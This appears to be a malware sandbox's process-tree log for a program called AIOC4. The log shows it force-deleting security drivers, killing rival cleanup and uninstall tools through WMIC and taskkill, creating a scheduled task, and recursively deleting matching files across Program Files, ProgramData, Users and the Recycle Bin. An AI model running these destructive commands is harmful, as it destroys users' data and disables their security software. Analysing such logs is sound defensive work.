C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot64.sys kisboot64.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot64.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kiscore.sys kiscore.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kiscore.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl.sys kisknl.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl_del.sys kisknl_del.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl_del.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl64_arm.sys kisknl64_arm.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl64_arm.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt.sys kisnetflt.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt64_arm.sys kisnetflt64_arm.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt64_arm.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm_ev.sys kisnetm_ev.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm_ev.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_arm.sys kisnetm64_arm.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_arm.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_ev.sys kisnetm64_ev.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_ev.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetmxp.sys kisnetmxp.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetmxp.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi.sys ksapi.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64.sys ksapi64.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64_arm.sys ksapi64_arm.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64_arm.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery.sys kusbquery.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery64.sys kusbquery64.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery64.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\tfossiksy.sys tfossiksy.sys.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\tfossiksy.sys*6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\2345* 2345*.remove6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\2345*6⤵
-
C:\Program Files\AIOC4\PrimaryScreen.exe"PrimaryScreen.exe" ScaleX6⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C ver6⤵
-
C:\Program Files\AIOC4\AIOC4.exe"C:\Program Files\AIOC4\AIOC4.exe" /ClearAUTOUninstaller6⤵
- Executes dropped EXE
- Sets file execution options in registry
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c ver7⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "JServer" /XML "C:\Program Files\AIOC4\AIOC_Cache\Tools\JServer.XML"7⤵
- Creates scheduled task(s)
-
C:\ProgramData\Microsoft\s_a.exe"C:\ProgramData\Microsoft\s_a.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /Q /A %TEMP%\*aioc_*7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C TASKKILL /F /IM AU_CN.exe7⤵
-
C:\Windows\system32\taskkill.exeTASKKILL /F /IM AU_CN.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C TASKKILL /F /IM "Easy remove - Autodesk系列软件卸载工具.exe"7⤵
-
C:\Windows\system32\taskkill.exeTASKKILL /F /IM "Easy remove - Autodesk系列软件卸载工具.exe"8⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\*Easy*remove*7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\mntemp7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\node.dll7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\node7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\webconfig.ini7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q %SystemRoot%\System32\NSudo*.exe7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q %SystemRoot%\SysWOW64\NSudo*.exe7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C RD /S /Q "C:\ProgramData\uninstall"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C RD /S /Q "C:\ProgramData\TEMP"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\ProgramData\0.bat7⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%@%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%java%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE8⤵
-
C:\Windows\system32\PING.EXEping -n 2 0.0.0.08⤵
- Runs ping.exe
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%@%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%java%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE8⤵
-
C:\Windows\system32\PING.EXEping -n 2 0.0.0.08⤵
- Runs ping.exe
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%@%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%java%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE8⤵
-
C:\Windows\system32\PING.EXEping -n 2 0.0.0.08⤵
- Runs ping.exe
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%@%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%java%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE8⤵
-
C:\Windows\system32\PING.EXEping -n 2 0.0.0.08⤵
- Runs ping.exe
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%@%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%java%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE8⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "%SystemRoot%\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "%SystemRoot%\System32\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "%SystemRoot%\SysWOW64\*AUTO*Uninstaller*"7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /B C:\Windows\*AUTO*Uninstaller*7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /B C:\Windows\System32\*AUTO*Uninstaller*7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /B C:\Windows\SysWOW64\*AUTO*Uninstaller*7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\msicuu2.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\msicuu.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*Easy*remove*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*CCleaner*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*geek*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*cad*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*cadallclear*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*iobit*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*Dism++*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*UninstallTool*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /A /Q "C:\\*Total*Uninstal*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\msicuu2.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\msicuu.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*Easy*remove*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*CCleaner*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*geek*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*cad*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*cadallclear*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*iobit*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*Dism++*"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\$Recycle.Bin\*Total*Uninstal*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\msicuu2.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\msicuu.*"7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*Easy*remove*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*CCleaner*"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*geek*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*cad*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*cadallclear*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*iobit*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*Dism++*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Documents and Settings\*Total*Uninstal*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\msicuu2.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\msicuu.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*Easy*remove*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*CCleaner*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*geek*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*cad*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*cadallclear*"7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*iobit*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*Dism++*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*Total*Uninstal*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\msicuu2.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\msicuu.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*Easy*remove*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*CCleaner*"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*geek*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*cad*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*cadallclear*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*iobit*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*Total*Uninstal*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*Dism++*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\msicuu2.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\msicuu.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*Easy*remove*"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*CCleaner*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*geek*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*cad*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*cadallclear*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*iobit*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*Dism++*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*Total*Uninstal*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\msicuu2.*"7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\msicuu.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*Easy*remove*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*CCleaner*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*geek*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*cad*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*cadallclear*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*iobit*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*Dism++*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*Total*Uninstal*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*AUTO*Uninstaller*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\msicuu2.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\msicuu.*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*Easy*remove*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*CCleaner*"7⤵
-
